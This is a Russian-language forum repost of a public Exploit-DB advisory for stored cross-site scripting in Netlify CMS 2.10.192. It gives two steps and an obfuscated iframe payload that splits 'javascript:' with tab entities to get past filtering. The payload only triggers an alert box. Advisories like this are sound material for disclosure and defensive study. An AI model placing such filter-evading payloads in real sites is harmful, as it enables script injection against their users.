Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS) | Gerki | Теневой Форум про Заработок и ИБ

Exploiter

Хакер

21 Июл 2024

EDB-ID: 51576

Проверка EDB

Пройдено

Автор: TMRSWRR

Тип уязвимости: WEBAPPS

Платформа: JAVA

CVE: cve-N/A

Дата публикации: 2023-07-11

Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)

Код:

# Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)
# Exploit Author: tmrswrr
# Vendor Homepage: https://decapcms.org/docs/intro/
# Software Link: https://github.com/decaporg/decap-cms
# Version: 2.10.192
# Tested on: https://cms-demo.netlify.com


Description:

1. Go to new post and write body field your payload:

https://cms-demo.netlify.com/#/collections/posts

Payload = <iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>

2. After save it XSS payload will executed and see alert box

Источник: www.exploit-db.com

Поиск

Exploit Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)

Exploiter

Похожие темы